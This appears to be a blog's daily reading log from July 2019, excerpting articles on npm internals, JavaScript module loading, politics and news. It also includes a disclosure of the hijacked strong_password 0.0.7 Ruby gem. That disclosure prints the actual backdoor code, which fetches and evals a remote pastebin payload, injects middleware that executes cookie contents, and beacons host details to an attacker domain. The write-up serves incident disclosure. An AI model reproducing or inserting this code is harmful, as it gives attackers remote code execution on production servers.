In the context of that file, this bit of code is loading up the children of a given node. In order to match Node’s module resolution algorithm, that should be reading the target and then loading the children there, rather than treating the link as the parent. In the mindset of general code cleanup, I modified it without even really noticing and then mistakenly let it slip past into a completely unrelated commit. When I tried to integrate read-package-tree (with this change) into the npm CLI, a bunch of tests broke in really bizarre ways. That’s when it hit me what was going on, and a lot of strange CLI behavior over the years started to make a ton of sense. Like, how occasionally a manually symlinked module would result in its dependencies being stripped away or mutated in some way that seemed to make no sense. (I’m sure most people don’t do this, but as someone who is probably too comfortable with module systems, I often mess with my projects with reckless abandon.) Prior to npm v3, there was no deduplication by default, and installation happened in a very naive “run in parallel, fetch whatever is still needed at that level” kind of way. It was dumb, in a mostly good way, but the result was that occasionally you’d get 15 copies of something when 1 would do just fine. It also meant that a proper progress bar was impossible, since the installer had no way of knowing when it would be done. (Simple loop detection helped it know that eventually it would be done, but not when, exactly.) Over the years, npm has had a lot of bugfixes and logic added to work around the issues that this one subtle mistake caused. The result of all that fixing, however, means that fixing the bug breaks a lot of stuff that works just fine today. The good news is that npm v7 will have Workspaces, and (once the installer is completely refactored into @npmcli/arborist), it’ll be trivial to implement. 
Out of idle curiosity, I tracked down where this bug had snuck in, though I was pretty sure I already knew the answer. It dates back to the original inception of the read-package-tree module. It really should have been caught and fixed in db70482 but, well, it wasn’t. Spotted my past self red-handed, messing with me as usual, sneaking bugs into my code. If I ever catch that guy, he’ll have quite a few things to answer for. Source: The npm Blog — An Old Bug

    Read at 04:45 pm, Jul 10th

  • Modern Script Loading

Modern Script Loading 09 July 2019 on Modules, Ecosystem Serving the right code to the right browsers can be tricky. Here are some options. Serving modern code to modern browsers can be great for performance. Your JavaScript bundles can contain more compact or optimized modern syntax, while still supporting older browsers. The tooling ecosystem has consolidated on using the module/nomodule pattern for declaratively loading modern vs. legacy code, which provides browsers with both sources and lets them decide which to use: <script type="module" src="/modern.js"></script> <script nomodule src="/legacy.js"></script> Unfortunately, it's not quite that straightforward. The HTML-based approach shown above triggers over-fetching of scripts in Edge and Safari. What can we do? We want to deliver two compile targets depending on the browser, but a couple of older browsers don't quite support the nice clean syntax for doing so. First, there's the Safari fix. Safari 10.1 supports JS Modules but not the nomodule attribute on scripts, which causes it to execute both the modern and legacy code (yikes!). Thankfully, Sam found a way to use a non-standard beforeload event supported in Safari 10 & 11 to polyfill nomodule. Option 1: Load Dynamically We can circumvent these issues by implementing a tiny script loader, similar to how loadCSS works. Instead of relying on browsers to implement both ES Modules and the nomodule attribute, we can attempt to execute a Module script as a "litmus test", then use the result of that test to choose whether to load modern or legacy code. 
<!-- use a module script to detect modern browsers: --> <script type=module> self.modern = true </script> <!-- now use that flag to load modern vs. legacy code: --> <script> document.head.appendChild((function(s){ if (self.modern) { s.src = '/modern.js'; s.type = 'module'; } else { s.src = '/legacy.js'; } return s })(document.createElement('script'))) </script> A standalone variant of this can be implemented by checking if the browser supports nomodule. This would mean browsers like Safari 10.1 are treated as legacy even though they support Modules, but that might be a good thing. Here's the code for that: <script> $loadjs("/modern.js","/legacy.js"); function $loadjs(src,fallback,s) { s = document.createElement('script'); if ('noModule' in s) { s.type = 'module'; s.src = src; } else { s.src = fallback; } document.head.appendChild(s) } </script> What's the trade-off? Preloading. The trouble with this solution is that, because it's completely dynamic, the browser won't be able to discover our JavaScript resources until it runs the bootstrapping code we wrote to inject modern vs. legacy scripts. Normally, browsers scan HTML as it is being streamed to look for resources they can preload. There's a solution, though it's not perfect: we can use <link rel=modulepreload> to preload the modern version of a bundle in modern browsers. Unfortunately, only Chrome supports modulepreload so far. <link rel="modulepreload" href="/modern.js"> <script type=module>self.modern=1</script> <!-- etc --> Whether this technique works for you can come down to the size of the HTML document you're embedding those scripts into. If your HTML payload is as small as a splash screen or just enough to bootstrap a client-side application, giving up the preload scanner is less likely to impact performance. If you are server-rendering a lot of meaningful HTML for the browser to stream, the preload scanner is your friend and this might not be the best approach for you. 
Here's what this solution might look like in prod: <link rel="modulepreload" href="/modern.js"> <script type=module>self.modern=1</script> <script> $loadjs("/modern.js","/legacy.js"); function $loadjs(e,d,c){c=document.createElement("script"),self.modern?(c.src=e,c.type="module"):c.src=d,document.head.appendChild(c)} </script> Option 2: User Agent Sniffing I don't have a concise code sample for this since User Agent detection is nontrivial, but there's a great Smashing Magazine article about it. Essentially, this technique starts with the same <script src=bundle.js> in the HTML for all browsers. When bundle.js is requested, the server parses the requesting browser's User Agent string and chooses whether to return modern or legacy JavaScript, depending on whether that browser is recognized as modern or not. While this approach is versatile, it comes with some severe implications: since server smarts are required, it doesn't work for static deployment (static site generators, Netlify, etc.); caching for those JavaScript URLs now varies based on User Agent, which is highly volatile; UA detection is difficult and can be prone to false classification; and the User Agent string is easily spoofable, with new UAs arriving daily. One way to address these limitations is to combine the module/nomodule pattern with User Agent differentiation in order to avoid sending multiple bundle versions in the first place. This approach still reduces the cacheability of the page, but allows for effective preloading, since the server generating our HTML knows whether to use modulepreload or preload. For websites already generating HTML on the server in response to each request, this can be an effective solution for modern script loading. Option 3: Penalize older browsers The ill effects of the module/nomodule pattern are seen in old versions of Chrome, Firefox and Safari - browser versions with very limited usage, since users are automatically updated to the latest version. 
This doesn't hold true for Edge 16-18, but there is hope: new versions of Edge will use a Chromium-based renderer that doesn't suffer from this issue. It might be perfectly reasonable for some applications to accept this trade-off: you get to deliver modern code to 90% of browsers, at the expense of some extra bandwidth on older browsers. Notably, none of the User Agents suffering from this over-fetching issue have significant mobile market share - so those bytes are less likely to be coming from an expensive mobile plan or through a device with a slow processor.

If you're building a site where your users are primarily on mobile or recent browsers, the simplest form of the module/nomodule pattern will work for the vast majority of your users. Just be sure to include the Safari 10.1 fix if you have usage from slightly older iOS devices.

<!-- polyfill `nomodule` in Safari 10.1: -->
<script type=module>
  !function(e,t,n){!("noModule"in(t=e.createElement("script")))&&"onbeforeload"in t&&(n=!1,e.addEventListener("beforeload",function(e){if(e.target===t)n=!0;else if(!e.target.hasAttribute("nomodule")||!n)return;e.preventDefault()},!0),t.type="module",t.src=".",e.head.appendChild(t),t.remove())}(document)
</script>

<!-- 90+% of browsers: -->
<script src=modern.js type=module></script>

<!-- IE, Edge <16, Safari <10.1, old desktop: -->
<script src=legacy.js nomodule async defer></script>

Option 4: Use conditional bundles

One clever approach here is to use nomodule to conditionally load bundles containing code that isn't needed in modern browsers, such as polyfills. With this approach, the worst case is that the polyfills are loaded or possibly even executed (in Safari 10.1), but the effect is limited to "over-polyfilling". Given that the current prevailing approach is to load and execute polyfills in all browsers, this can be a net improvement.
<!-- newer browsers won't load this bundle: -->
<script nomodule src="polyfills.js"></script>

<!-- all browsers load this one: -->
<script src="/bundle.js"></script>

Angular CLI can be configured to use this approach for polyfills, as demonstrated by Minko Gechev. After reading about this approach, I realized we could switch the automatic polyfill injection in preact-cli to use it - this PR shows how easy it can be to adopt the technique. For those using Webpack, there's a handy plugin for html-webpack-plugin that makes it easy to add nomodule to polyfill bundles.

What should you do?

The answer depends on your use case. If you're building a client-side application and your app's HTML payload is little more than a <script>, you might find Option 1 compelling. If you're building a server-rendered website and can afford the caching impact, Option 2 could be for you. If you're using universal rendering, the performance benefits offered by preload scanning might be very important, so look to Option 3 or Option 4. Choose what fits your architecture.

Personally, I tend to optimize for faster parse times on mobile rather than the download cost on some desktop browsers. Mobile users experience parsing and data costs as actual expenses - battery drain and data fees - whereas desktop users don't tend to have these constraints. Plus, it's optimizing for the 90% - for the stuff I work on, most users are on modern and/or mobile browsers.

Further Reading

Interested in diving deeper into this space? Here are some places to start digging:

Thanks to Phil, Shubhie, Alex, Houssein, Ralph and Addy for the feedback.

Jason Miller

Source: Modern Script Loading

    Read at 01:55 pm, Jul 10th

  • One Conversation, Two Histories — My perspective on an incident in a San Francisco doorway

    Source: One Conversation, Two Histories — My perspective on an incident in a San Francisco doorway

    Read at 01:48 pm, Jul 10th

  • Zoom Zero Day: 4+ Million Webcams & maybe an RCE? Just get them to visit your website!

    Source: Zoom Zero Day: 4+ Million Webcams & maybe an RCE? Just get them to visit your website!

    Read at 10:14 am, Jul 10th

Day of Jul 9th, 2019

  • Building reusable components using React

    React is one of the most popular JavaScript libraries for building user interfaces. To build an application using React, you just need to build encapsulated components that can contain their own state.

    Read at 09:31 am, Jul 9th

  • Next steps toward Go 2

    We’re well on the way towards the release of Go 1.13, hopefully in early August of this year. This is the first release that will include concrete changes to the language (rather than just minor adjustments to the spec), after a longer moratorium on any such changes.

    Read at 07:12 pm, Jul 9th

  • Former fighter pilot launches Senate challenge against McConnell

    Amy McGrath, a Kentucky Democrat and former fighter pilot who lost a House race last year, said Tuesday she's running for Senate against Majority Leader Mitch McConnell in what could be one of 2020's most expensive races.

    Read at 06:46 pm, Jul 9th

  • Jony Ive Is Leaving Apple

    Apple Newsroom: Apple today announced that Sir Jony Ive, Apple’s chief design officer, will depart the company as an employee later this year to form an independent design company which will count Apple among its primary clients.

    Read at 02:37 pm, Jul 9th

  • I was 7 words away from being spear-phished

    Three weeks ago I received a very flattering email from the University of Cambridge, asking me to judge the Adam Smith Prize for Economics: Dear Robert, My name is Gregory Harris. I’m one of the Adam Smith Prize Organizers.

    Read at 01:05 pm, Jul 9th

  • The Layout Instability API

    Detect unexpected layout shifts in JavaScript. Have you ever been reading an article online when something suddenly changes on the page? Without warning, the text moves, and you've lost your place.
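    As a hedged sketch of how this API is typically consumed (the helper function and names below are illustrative, not from the article): layout shifts surface as "layout-shift" performance entries, each carrying a value score and a hadRecentInput flag, and input-driven shifts are usually excluded when accumulating a total.

```javascript
// Pure helper: total the layout-shift scores, skipping shifts that
// happened right after user input (those are considered expected).
function sumLayoutShifts(entries) {
  return entries
    .filter((entry) => !entry.hadRecentInput)
    .reduce((total, entry) => total + entry.value, 0);
}

// Browser-only wiring, guarded so the helper stays usable elsewhere:
if (typeof PerformanceObserver !== 'undefined') {
  new PerformanceObserver((list) => {
    console.log('layout shift so far:', sumLayoutShifts(list.getEntries()));
  }).observe({ type: 'layout-shift', buffered: true });
}
```

    The observer callback fires as new shifts are detected, so a running total can be kept and reported when the page is hidden or unloaded.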

    Read at 09:44 am, Jul 9th

  • The Immigration Court Judge Who Has Rejected Every Asylum Seeker

    Oakdale, a sleepy town of 7,600 in Louisiana, is home to a drive-through daiquiri stand, two Mexican restaurants, numerous shuttered storefronts, and, on its northeastern border, the Oakdale Immigration Court.

    Read at 07:08 pm, Jul 9th

  • Google Launches Effort to Make Robots Exclusion Protocol an Internet Standard, Open Sources Robots.txt Parser

    Website owners have been excluding web crawlers using the Robots Exclusion Protocol (REP) on robots.txt files for 25 years. Up until now, there has never been an official Internet standard, no documented specification for writing the rules correctly according to the protocol.

    Read at 09:27 am, Jul 9th

  • Menus with “Dynamic Hit Areas”

    The most compelling examples that solve this issue are the ones that involve extra hidden "hit areas." Amazon doesn't really have menus like this anymore (that I can see), and perhaps this is one of the reasons why. But in the past, they've used this hit area technique.

    Read at 09:27 am, Jul 9th

  • 12 Tips for Improving JavaScript Performance

    One of the most important aspects of creating a webpage or an app is performance. Nobody wants an app that crashes or a webpage that doesn’t load, and users aren’t willing to wait very long.

    Read at 09:26 am, Jul 9th

  • Announcing React Native 0.60

    After months of hard work from hundreds of contributors, the React Native Core team is proud to announce the release of version 0.60. This release handles significant migrations for both Android and iOS platforms, and many issues are resolved too. This blog post covers the highlights of the release.

    Read at 09:14 am, Jul 9th

  • In US 1st, baby is born from dead donor's transplanted womb

    This June 18, 2019 photo provided by the Cleveland Clinic shows the newborn girl born from a woman who received the hospital's first uterus transplant. Uterine transplants have enabled more than a dozen women to give birth. (Stephen Travarca/Cleveland Clinic via AP) CLEVELAND (AP) — The Cleveland Clinic says it has delivered the first baby in North America after a womb transplant from a dead donor. Uterine transplants have enabled more than a dozen women to give birth, usually with wombs donated from a living donor such as a friend or relative. In December, doctors in Brazil reported the world’s first birth using a deceased donor’s womb. These transplants were pioneered by a Swedish doctor who did the first successful one five years ago. The Cleveland hospital said Tuesday that the girl was born in June. The clinic has done five uterus transplants so far and three have been successful, with two women waiting to attempt pregnancy with new wombs. In all, the clinic aims to enroll 10 women in its study. Source: In US 1st, baby is born from dead donor’s transplanted womb

    Read at 02:09 pm, Jul 9th

Day of Jul 8th, 2019

  • Toast


    Read at 09:16 am, Jul 8th

  • No Algorithms

    I’ve been asked a few times about using algorithms in NetNewsWire to bring articles you wouldn’t otherwise have seen — from outside your feeds list — to your attention.

    Read at 10:06 pm, Jul 8th

  • Building an IndieWeb Reader

    Over the last several months, I've been slowly putting the pieces in place to be able to build a solid indieweb reader. Today, I feel like I finally have enough in place to consider this functional enough that I am now using it every day!

    Read at 07:20 pm, Jul 8th

  • An IndieWeb reader: My new home on the internet

    I have a new home on the internet. I don’t visit the Twitter home timeline or the Facebook news feed anymore. I don’t open the Instagram app except when I post a photo. I still have accounts there — I just don’t visit those sites anymore.

    Read at 07:10 pm, Jul 8th

  • Why Milkshaking Works

    The far right fears nothing more than public humiliation.

    Read at 07:05 pm, Jul 8th

  • An Executive Order Can’t Fix Trump’s Census Problem

    President Donald Trump’s announcement that he will consider using an executive order to get a citizenship question on the 2020 census is but the latest presidential attempt to exaggerate or mythologize the power of the executive order.

    Read at 07:02 pm, Jul 8th

  • /Red Net/

    Happy #MayDay Comrades! Chaos in Paris today as police charge at anti-government protesters and attack them with batons. Has this been on the BBC yet? pic.twitter.com/T31bvCd5Of #GiletsJaunes #MayDay

    Read at 12:21 pm, Jul 8th

  • ES proposal: public class fields

    This blog post is the first in a series of posts on fields in classes. Fields are about creating properties and similar constructs from inside the bodies of classes. Once finished, this series replaces 2ality’s prior blog post on fields.
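    As a quick illustrative sketch (the class name here is made up), a public instance field declares a per-instance property directly in the class body, with no constructor needed:

```javascript
class Counter {
  count = 0; // public instance field: each instance gets its own copy

  increment() {
    return ++this.count;
  }
}

const c = new Counter();
c.increment(); // 1
c.increment(); // 2
```

    Field initializers run once per instance, so a fresh new Counter().count starts at 0 again.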

    Read at 09:21 am, Jul 8th

  • New Intl APIs in JavaScript

    The Intl object is available in the global scope and is used for formatting strings, numbers, and dates and times in locale-specific formats. It does the work of internationalizing information displayed to the user.
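    A small hedged sketch of the kind of formatting Intl enables; the locale and option choices below are illustrative, not the only ones:

```javascript
// Currency formatting:
const price = new Intl.NumberFormat('en-US', {
  style: 'currency',
  currency: 'USD',
}).format(1234.5); // "$1,234.50"

// Date formatting:
const date = new Intl.DateTimeFormat('en-US', {
  year: 'numeric', month: 'long', day: 'numeric',
}).format(new Date(2019, 6, 8)); // "July 8, 2019"

// Relative time, one of the newer Intl APIs:
const relative = new Intl.RelativeTimeFormat('en', { numeric: 'auto' })
  .format(-1, 'day'); // "yesterday"
```

    Swapping the locale string (say, to 'de-DE') changes separators, month names, and currency placement with no other code changes.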

    Read at 10:05 pm, Jul 8th

  • Lessons in learning web development

    These are tips I wrote to my fellow colleagues learning their way into web development. I hope it’s either useful or entertaining. The Web is a wild and young forest. We are constantly trying to make it greener and more accessible without burning it so much.

    Read at 09:14 am, Jul 8th

  • Politely Passing on Pass the Hat

    The “Pass the Hat” proposal, while incredibly well-meaning, could create as many problems as it would hope to solve. Recently, I chatted with Nick Bunce, former Co-Chair of Houston DSA.

    Read at 09:10 am, Jul 8th

  • Passing the Hat for Cross-Chapter Solidarity

    I visited the NYC-DSA Media Working Group one slushy winter night, and left feeling a little bit jealous. The room was crowded with more than 50 socialists, which is easily more than five times the regular attendance of the monthly meetings in Central Florida DSA in Gainesville, FL.

    Read at 09:06 am, Jul 8th

  • What a June! A review of our wins in 2019.

    Over the last year, NYC-DSA has had three priority campaigns: #UniversalRentControl, Health Care for All, and Defeat Amazon.

    Read at 09:01 am, Jul 8th

  • Working Groups

    This month, the Debt & Finance Working Group held an Organizing Committee election. Four members will be continuing on the committee and one new member will be joining. Debt & Finance has been very focused on its public banking campaign.

    Read at 08:54 am, Jul 8th

  • NYPD Used Deadly Force to Stop Cyclist Suspected of Running Red Light – Streetsblog New York City

    A law enforcement regime that doesn't take into account the relative capacity of bicycling and driving to cause harm is deeply flawed, and leads to scenarios like cops confiscating e-bikes from delivery workers as motorists kill seniors in crosswalks. Cyclists are demanding answers to the latest attack. Meet George Calderaro, a victim of the NYPD's overzealous pursuit of cyclists. Here’s an argument for using cameras to enforce traffic laws: getting cops like this off of the traffic beat. As first reported in the Daily News, Brooklyn cyclist Ben Kopciel was issued a $200 ticket earlier this month in what looks like a retaliatory gesture for telling an NYPD officer to get out of the […] What is with the NYPD's ongoing crackdowns against cyclists after cyclists are killed? Considering what happened to longtime street safety advocate Hilda Cohen last Friday afternoon, you have to wonder how many “scofflaw cyclists” are in actuality the victims of police harassment. The incident is also another example of wasted NYPD resources that could be used to make streets safer. Cohen says she rode through a yellow light […] Source: NYPD Used Deadly Force to Stop Cyclist Suspected of Running Red Light – Streetsblog New York City

    Read at 05:20 pm, Jul 8th

  • The Progressive Nonargument Against Biden - The Atlantic

    “I literally leaned back in my couch and couldn’t believe that one moment,” he told CNN. “I think that anybody that knows our painful history knows that on voting rights, on civil rights, on the protections from hate crimes, African Americans and many other groups in this country have had to turn to the federal government to intervene because there were states that were violating those rights.” That history is painful and important. Many Americans still underestimate the ongoing need for federal protection of civil rights against state and local governments. But wait a minute. Hearing Booker, you might think that Biden has opposed federal interventions to protect voting rights, civil rights, and victims of hate crimes. In fact, Biden has long supported an expansive federal role in all three areas and voted in 2001 to add sexual orientation to the protected categories in federal hate-crime law. There’s a lot about Biden’s record to dislike. Booker remarked on an area where he’s—by liberal Democrat standards—strong. Listening to Harris, you might think that she, unlike Biden, favors federally mandated busing as a tool to reduce segregation. “Does Harris support busing for school integration right now?” the New York Times reporter Astead W. Herndon asked Ian Sams, her campaign manager, on June 27. “Yes,” he replied. But Harris later clarified that she does not favor federally mandated busing right now. Rather, she thinks that some school districts should consider it on a voluntary basis, and that for the most part busing is no longer necessary in America. “It sounds here like @KamalaHarris is now taking something more like the @JoeBiden position on school busing,” said David Axelrod, a political adviser in the Obama administration. 
“So what was that whole thing at the debate all about?” It wasn’t about Biden’s electability or what a President Biden would do in 2021 about busing or other federal interventions to protect civil rights (or even what he did from 2009 to 2016). Harris and Biden disagree on whether federally mandated busing was a sound policy almost 50 years ago. They have no similar difference on federal civil-rights policy today. Would Harris necessarily be better on matters of federal civil rights than Biden? At the very least, her record as a prosecutor makes that an open question. I don’t mean to rule out the past. Biden’s vote in favor of the Iraq War ought to count against him, but that’s in part because it is relevant to what he might do if urged to launch a future war of choice against a foreign adversary. It makes no sense for Democrats to focus so intensely on busing, an issue with these characteristics:

  • Absent from every list of voter priorities
  • Backward-looking
  • Unlikely to come before the next president
  • No difference in the current positions of candidates
  • “Debate” largely focused on demands for apologies

Source: The Progressive Nonargument Against Biden – The Atlantic

    Read at 11:59 am, Jul 8th

  • strong_password v0.0.7 rubygem hijacked

strong_password v0.0.7 rubygem hijacked
Tute Costa
July 3, 2019

I recently updated minor and patch versions of the gems our Rails app uses. We want to keep dependencies fresh, bugs fixed, and security vulnerabilities addressed while maintaining a high chance of backward compatibility with our codebase. In all, there were 25 gems to upgrade. I went line by line, linking to each library’s changeset. This due diligence had never turned up significant surprises for me, until this time.

Most gems have a CHANGELOG.md file that describes the changes in each version. Some do not, and I had to compare by git tags or commit lists (as with the cocoon and bcrypt gems). The jquery-rails upgrade contains a jQuery.js upgrade, so the related log was in another project. And I couldn’t find the changes for strong_password. It appeared to have gone from 0.0.6 to 0.0.7, yet the last change on any branch in GitHub was from six months ago, and we were up to date with those. If there was new code, it existed only on RubyGems.org.

I downloaded the gem from RubyGems and compared its contents with the latest copy in GitHub. At the end of lib/strong_password/strength_checker.rb version 0.0.7 there was the following:

def _!;begin;yield;rescue Exception;end;end
_!{Thread.new{loop{_!{sleep rand*3333;eval(Net::HTTP.get(URI('https://pastebin.com/raw/xa456PFt')))}}}if Rails.env[0]=="p"}

I checked who published it: an almost empty account, with a different name than the maintainer’s, with access only to this gem.
I checked the maintainer’s email in GitHub and wrote to him with the prettified version of the diff:

def _!; begin; yield; rescue Exception; end; end
_!{
  Thread.new {
    loop {
      _!{
        sleep rand * 3333;
        eval(
          Net::HTTP.get(
            URI('https://pastebin.com/raw/xa456PFt')
          )
        )
      }
    }
  } if Rails.env[0] == "p"
}

In a loop within a new thread, after waiting for a random number of seconds (up to about an hour), it fetches and runs the code stored in a pastebin.com paste, only if running in production, with an empty exception handler that ignores any error it may raise. In fifteen minutes, Brian McManus wrote back:

The gem seems to have been pulled out from under me… When I login to rubygems.org I don’t seem to have ownership now. Bogus 0.0.7 release was created 6/25/2019.

In case the Pastebin got deleted or changed, I emailed the Pastebin contents that were up on June 28th at 8 PM UTC, carbon-copying Ruby on Rails’ security coordinator, Rafael França:

_! {
  unless defined?(Z1)
    Rack::Sendfile.prepend Module.new{define_method(:call){|e|
      _!{eval(Base64.urlsafe_decode64(e['HTTP_COOKIE'].match(/___id=(.+);/)[1]))}
      super(e)}}
    Z1 = "(:"
  end
}
_! {
  Faraday.get("http://smiley.zzz.com.ua", { "x" => ENV["URL_HOST"].to_s })

While waiting for their answers, I tried to understand the code. If it hasn’t run before (checked via the existence of the Z1 dummy constant), it injects a middleware that eval’s cookies named with an ___id suffix, only in production, all surrounded by the empty exception handler _! function that’s defined in the hijacked gem, opening the door to silently executing remote code in production at the attacker’s will. It also sends a request to an attacker-controlled domain with an HTTP header identifying the infected host’s URL. That notification depends on the Faraday gem being loaded (which the oauth2 and stripe gems, for example, include). Rafael França replied in 25 minutes, adding security@rubygems.org to the thread.
Someone at RubyGems quickly yanked it, and the next day André Arko confirmed he had yanked it, locked the kickball RubyGems account, and added Brian back to the gem. I requested a CVE identifier (Common Vulnerabilities and Exposures) from cve-request@mitre.org, and they assigned CVE-2019-13354, which I used to announce the potential issue in production installations to the rubysec/ruby-advisory-db project and the ruby-security-ann Google Group. Source: strong_password v0.0.7 rubygem hijacked

    Read at 10:17 am, Jul 8th

Day of Jul 7th, 2019